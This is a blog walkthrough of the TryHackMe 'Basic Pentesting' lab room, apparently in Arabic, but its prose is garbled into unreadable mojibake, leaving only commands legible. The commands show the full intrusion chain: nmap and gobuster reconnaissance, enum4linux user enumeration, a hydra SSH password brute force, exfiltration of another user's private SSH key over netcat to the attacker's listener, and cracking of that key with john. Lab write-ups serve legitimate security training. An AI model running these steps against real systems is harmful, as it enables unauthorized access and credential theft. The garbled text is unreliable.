Search ๐Ÿ”Ž๐Ÿ–ฅ️

TryHackMe|BasicPentesting WriteUp\Walkthrough (Arabic)

ุจุณู… ุงู„ู„ู‡

ุงู„ู„ูŠ ูŠุจุบู‰ ูŠุดูˆู ุงู„ุญู„ ู…ุดุฑูˆุญ ููŠุฏูŠูˆ ูŠุฑุฌุน ู„ู„ููŠุฏูŠูˆ ุนู„ู‰ ู‚ู†ุงุชูŠ ุจุงู„ูŠูˆุชูŠูˆุจ ุนู„ู‰ ู‡ุฐุง ุงู„ุฑุงุจุท:

 


ุฑุงุจุท ุงู„ุชุญุฏูŠ: https://tryhackme.com/r/room/basicpentestingjt

====================================================

ูƒู„ู…ุฉ IP ููŠ ูƒู„ ุงู„ูƒูˆู…ุงู†ุฏุฒ ุงู„ู„ูŠ ุฃูƒุชุจู‡ุง ุชُุณุชุจุฏู„ ุจุงู„ู€IP ู„ู„ู…ุดูŠู† ุญู‚ุชูƒู… ุนู„ู‰ TryHackMe

ุฃูˆู„ ุญุงุฌุฉ ู†ุดุบู„ ุงู„ู€machine ูˆู†ุชุฃูƒุฏ ุฅู†ู†ุง ุงุชุตู„ู†ุง ุจุดุจูƒุฉ TryHackMe ูˆุงู„ุงุชุตุงู„ ู…ุถุจูˆุท، ุจุนุฏูŠู† ู†ุจุฏุฃ ุจุฃูˆู„ ุฎุทูˆุฉ ู„ู„ุญู„ ูˆู‡ูŠ ุฅู†ู†ุง ู†ุณูˆูŠ scan ู„ู„ุดุจูƒุฉ ุจุงุณุชุฎุฏุงู… nmap

sudo nmap IP -vv

ุทู„ุน ู…ุนุงู†ุง 6 ุจูˆุฑุชุงุช، ู†ุฑุฌุน ู†ุณูˆูŠ Aggressive ุณูƒุงู† ุนู„ู‰ ู†ูุณ ู‡ุฐู‡ ุงู„ุจูˆุฑุชุงุช

sudo nmap IP -vv -A -p 22,80,139,445,8009,8080

ุจูˆุฑุช 22 ุนู„ูŠู‡ุง SSH، ูˆุนุฑูู†ุง ู…ู† ุฎู„ุงู„ ุงู„ู€version ุฅู† ู†ุธุงู… ุงู„ุชุดุบูŠู„ ู‡ูˆ ubuntu، ุจูˆุฑุช 80 ูˆ 8009 ูˆ 8080 ูƒู„ู‡ุง ุนู„ูŠู‡ุง web servers. 

ุฅุฐุง ุฒุฑู†ุง ุจูˆุฑุช 80 ุนู„ู‰ ุงู„ู…ุชุตูุญ ู…ูƒุชูˆุจ ุฑุณุงู„ุฉ under going maintenance ูˆููŠ ุงู„ู€source code ุนู†ุฏู†ุง ู…ู„ุงุญุธุฉ 

ูŠู‚ูˆู„ ุดูŠูƒ ุนู„ู‰ dev notes، ู„ูƒู† ูˆูŠู†ู‡ุง ู‡ุฐู‡ ุงู„ู…ู„ุงุญุธุงุช؟؟، ูู…ู…ูƒู† ูŠูƒูˆู† ููŠ ู…ุณุงุฑุงุช ู…ูˆุฌูˆุฏุฉ ุบูŠุฑ ุงู„ู…ุณุงุฑ ุงู„ุฑุฆูŠุณูŠ، ูˆุนุดุงู† ู†ุนุฑู ุจู†ุณูˆูŠ directory enumeration  ุจุงุณุชุฎุฏุงู… gobuster

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP/ -t 64

ุทู„ุน ู…ุนุงู†ุง ุงู„ู…ุณุงุฑ development 

ู†ุฑูˆุญ ู„ู‡ ููŠ ุงู„ู…ุชุตูุญ، ูˆุจู†ู„ุงู‚ูŠ ู…ู„ููŠู† ู†ุตูŠุฉ، ุงู„ู…ู„ู dev.txt ููŠู‡ ู…ุญุงุฏุซุฉ ุจูŠู† J ูˆ K، ู…ุนู†ุงุชู‡ ุงุญุชู…ุงู„ ูƒุจูŠุฑ ูŠูƒูˆู† ุนู†ุฏูŠ ู…ุณุชุฎุฏู…ูŠู† ุนู„ู‰ ุงู„ู†ุธุงู…، ูˆุงุญุฏ ุงุณู…ู‡ ูŠุจุฏุฃ ุจู€ J ูˆุงู„ุซุงู†ูŠ ุจู€ K. 

ููŠ ุงู„ู…ู„ู ุงู„ุซุงู†ูŠ j.txt ุงู„ุฑุณุงู„ุฉ ู‚ุงุฏู…ุฉ ู…ู† K ูˆูŠู‚ูˆู„ ููŠู‡ุง ู„ู€J ุฅู†ู‡ ู‚ุฏุฑ ูŠุนุฑู ูƒู„ู…ุฉ ุงู„ุณุฑ ู„ู‡، ูˆู„ุงุฒู… ูŠุบูŠุฑู‡ุง ุจุฃุณุฑุน ูˆู‚ุช. 

ู…ุนู†ุงุชู‡ ุฅู†ู†ุง ู†ู‚ุฏุฑ ู†ุณูˆูŠ crack ู„ูƒู„ู…ุฉ ุงู„ุณุฑ ู„ู€J، ู„ูƒู† ุงู„ู…ุดูƒู„ุฉ ุฅู† ุงุญู†ุง ู…ุง ู†ุนุฑู ุงุณู…ู‡ ูƒุงู…ู„، ูู‚ุท ุฃูˆู„ ุญุฑู، ู„ูƒู† ุจู…ุง ุฅู† ุฌู‡ุงุฒ ุงู„ุถุญูŠุฉ ุดุบุงู„ ุนู„ูŠู‡ smb، ู…ุนู†ุงุชู‡ ุฃู‚ุฏุฑ ุฃุณุชุฎุฏู… enumrlinux ุนุดุงู† ุฃุณูˆูŠ ุณูƒุงู† ุนู„ู‰ ุงู„ุฌู‡ุงุฒ ูˆู†ุนุฑู ุฃุณู…ุงุก ุงู„ู…ุณุชุฎุฏู…ูŠู†، ูุจู†ุดุบู„ ู‡ุฐู‡ ุงู„ูƒูˆู…ุงู†ุฏ

enum4linux -a IP

ุจุนุฏ ู…ุง ุชู†ุชู‡ูŠ ุจูŠุทู„ุน ู…ุนุงู†ุง ุฃุณู…ุงุก ุงู„ู…ุณุชุฎุฏู…ูŠู† ูˆู‡ู… Kay ูˆ Jan

ูุงู„ุญูŠู† ู†ุงุฎุฐ jan ูˆู†ุณูˆูŠ ุนู„ูŠู‡ bruteforce ุจุงุณุชุฎุฏุงู… hydra

 hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://IP  -t 64

ูˆุจู†ุญุตู„ ุนู„ู‰ ูƒู„ู…ุฉ ุงู„ุณุฑ، ุซู… ู†ุณุชุฎุฏู…ู‡ุง ุนุดุงู† ู†ุณุฌู„ ุฏุฎูˆู„ ุนู„ู‰ ุงู„ู†ุธุงู… ุจุงุณุชุฎุฏุงู… ssh
ssh jan@IP 
ู†ุฑูˆุญ ู„ู„ู€home ุซู… ู„ู€jan
cd /home/jan
ls 
ูˆู…ุง ููŠ ุดูŠุก ู…ู‡ู…، 
ู†ุฑูˆุญ ู„ู€kay

cd ..
cd kay
ls -a

ู„ู‚ูŠู†ุง ุนู†ุฏู†ุง ู…ุฌู„ุฏ ssh ูˆุงู„ู„ูŠ ู‡ูˆ ุงู„ู…ุฌู„ุฏ ุงู„ู„ูŠ ูŠุชู… ููŠู‡ ุญูุธ ู…ูุงุชูŠุญ ssh، ูˆุฏุงุฆู…ุง ูŠูƒูˆู† ู…ุฎููŠ، ู„ู…ุง ู†ุฏุฎู„ ุนู„ูŠู‡ ุจู†ู„ุงู‚ูŠ ู…ูุงุชูŠุญ ุงู„ู…ุณุชุฎุฏู… kay ู…ูˆุฌูˆุฏุฉ ูˆุจุฅู…ูƒุงู†ุง ู‚ุฑุงุฆุชู‡ุง

ูุจู†ุงุฎุฐ ุงู„ู€private key ูˆุงู„ู„ูŠ ุงุณู…ู‡ id_rsa ูˆู†ุณุฌู„ ุฏุฎูˆู„ ุนู„ู‰ ุงู„ู†ุธุงู… ุจุงุณุชุฎุฏุงู…ู‡، ููŠุตูŠุฑ ู†ุฏุฎู„ ูƒุงู„ู…ุณุชุฎุฏู… kay. ุฃูˆู„ ุดูŠุก ู†ู†ู‚ู„ ุงู„ู…ู„ู ุนู„ู‰ ู†ุธุงู…ู†ุง، ุจุฃุณุชุฎุฏู… netcat

ููŠ ncat ุงู„ู€listener ู‡ูˆ ุงู„ู„ูŠ ูŠุณุชู‚ุจู„ ูˆุงู„ู€Client ู‡ูˆ ุงู„ู„ูŠ ูŠุฑุณู„، ูˆู„ุงุฒู… ู†ุดุบู„ ุงู„ู€listener ู‚ุจู„ ุงู„ู€client

ุนู„ู‰ ุฌู‡ุงุฒู†ุง 

nc -nlvp 1233 > id_rsa

ุนู„ู‰ ุงู„ุถุญูŠุฉ

nc -nv OpenVPN-IP 1233 < id_rsa

ู„ู…ุง ูŠุฌูŠู†ุง ุงู„ู…ู„ู ุนู„ู‰ ุฌู‡ุงุฒู†ุง ูˆู†ูุชุญ ุจู†ู„ุงุญุธ ุฅู†ู‡ ู…ุดูุฑ، ูˆุนุดุงู† ู†ููƒ ุงู„ุชุดููŠุฑ ู†ุณุชุฎุฏู… john

ssh2john id_rsa > hash

john hash

ูˆุจู†ุญุตู„ ุนู„ู‰ ูƒู„ู…ุฉ ุงู„ุณุฑ ุงู„ู„ูŠ ุชุฎู„ูŠู†ุง ู†ู‚ุฏุฑ ู†ุณุชุฎุฏู…ู‡ ูˆู†ุชุตู„ ุจุงู„ุถุญูŠุฉ، ุจุงู‚ูŠ ุฎุทูˆุฉ ูˆุญุฏู‡ ุนุดุงู† ู†ู‚ุฏุฑ ู†ุณุชุฎุฏู…ู‡ ุจู†ุฌุงุญ ูˆุงู„ู„ูŠ ู‡ูŠ ุฅู†ู†ุง ู†ุบูŠุฑ ุตู„ุงุญูŠุงุช ุงู„ู…ู„ู

chmod 400 id_rsa

ุซู… ู†ุชุตู„ ุจุงู„ุถุญูŠุฉ

ssh kay@IP -i id_rsa 

ุซู… ุจูŠุทู„ุจ ูƒู„ู…ุฉ ุงู„ุณุฑ، ู†ุนุทูŠู‡ ูƒู„ู…ุฉ ุงู„ุณุฑ ุงู„ู„ูŠ ุชูˆ ุญุตู„ู†ุง ุนู„ูŠู‡ุง، ูˆุจูƒุฐุง ู†ูƒูˆู† ุฏุฎู„ู†ุง ุนู„ู‰ ุญุณุงุจ kay

ุซู… ู†ุนุฑุถ ุงู„ู…ู„ู pass.bak ูˆุจูƒุฐุง ูŠูƒูˆู† ุญุตู„ู†ุง ุนู„ู‰ ุงู„ูู„ุงู‚✨ ูˆุงู†ุชู‡ูŠู†ุง ู…ู† ุงู„ุญู„. 

ูˆู‡ู†ุง ุฅุฌุงุจุงุช ุงู„ุฃุณุฆู„ุฉ ุจุงุณุชู†ุซุงุก ูƒู„ู…ุงุช ุงู„ุณุฑ ูˆุงู„ูู„ุงู‚:

Comments

Popular posts from this blog

TryHackMe|Blog WriteUp\Walkthrough (Arabic)

TryHackMe|GoldenEye WriteUp\Walkthrough (English)

TryHackMe|Gallery WriteUp\Walkthrough (English)